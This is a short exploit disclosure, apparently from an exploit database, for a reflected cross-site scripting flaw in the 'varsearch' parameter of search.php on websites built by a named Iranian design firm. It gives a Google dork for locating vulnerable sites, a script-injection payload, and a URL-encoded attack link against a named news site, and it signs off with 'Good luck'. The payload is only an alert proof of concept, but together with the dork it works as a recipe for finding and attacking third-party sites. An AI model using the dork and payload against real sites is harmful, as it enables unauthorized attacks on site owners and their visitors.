# Exploit Title: xss search طراحی و تولید: مؤسسه احرار اندیشه
# Google Dork: intext: طراحی و تولید: مؤسسه احرار اندیشه or intext: طراحی و تولید: مؤسسه احرار اندیشه
inurl:search.php?varsearch=
# Date: 2017-08-14
# Exploit Author: Mkali07
# Vendor Homepage: http://ahrareandeysheh.com/
# Tested on: Linux,win10
#Contact With Me : Mkalim07@protonmail.com
# xxs :
#www.site.ir/search.php?varsearch=<script>alert("xss")</script>
example:http://sabernews.com/search.php?varsearch=%3Cscript%3Ealert%28%22xxs%22%29%3C%2Fscript%3E
Good luck
